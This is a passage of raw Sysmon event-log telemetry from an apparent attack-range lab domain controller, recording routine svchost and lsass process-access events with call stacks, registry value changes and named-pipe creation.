09:20:00.732{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052760Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.732{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052759Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.732{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052758Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.732{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052757Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.732{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x80000000000000001052756Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:20:00.732{5EBD8912-8CC0-6151-0F00-00000000FD01}300\Ctx_WinStation_API_serviceC:\Windows\System32\svchost.exe 17141700x80000000000000001052755Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:20:00.732{5EBD8912-8CC0-6151-0F00-00000000FD01}300\TermSrv_API_serviceC:\Windows\System32\svchost.exe 10341000x80000000000000001052754Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.717{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1300-00000000FD01}360C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001052753Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.701{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{5dd491df-f412-4514-aed4-6dd25c824fd2}\NetworkPerformsHijackingDWORD (0x00000000) 13241300x80000000000000001052752Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.701{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{5dd491df-f412-4514-aed4-6dd25c824fd2}\LastProbeTimeDWORD (0x61518cc0) 13241300x80000000000000001052751Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.701{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Winmgmt\Parameters\ServiceDllUnloadOnStopDWORD (0x00000001) 13241300x80000000000000001052750Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.701{5EBD8912-8CC0-6151-1000-00000000FD01}440C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{5DD491DF-F412-4514-AED4-6DD25C824FD2}\DateLastConnectedBinary Data 13241300x80000000000000001052749Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.701{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x80000000000000001052748Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.701{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052747Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.701{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052746Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.701{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052745Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.670{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052744Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.670{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052743Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.654{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052742Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.654{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052741Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.654{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052740Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.654{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052739Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.639{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052738Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.639{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052737Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.639{5EBD8912-8CBD-6151-0B00-00000000FD01}640672C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052736Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.623{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052735Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.623{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052734Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.623{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001052733Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.623{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\NextInstanceDWORD (0x00000015) 13241300x80000000000000001052732Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.623{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\CountDWORD (0x00000015) 13241300x80000000000000001052731Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.623{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\20UMB\UMB\1&841921d&0&TERMINPUT_BUS 13241300x80000000000000001052730Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.623{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\NextInstanceDWORD (0x00000002) 13241300x80000000000000001052729Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.623{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\CountDWORD (0x00000002) 13241300x80000000000000001052728Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.623{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\1UMB\UMB\1&841921d&0&TERMINPUT_BUS 10341000x80000000000000001052727Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 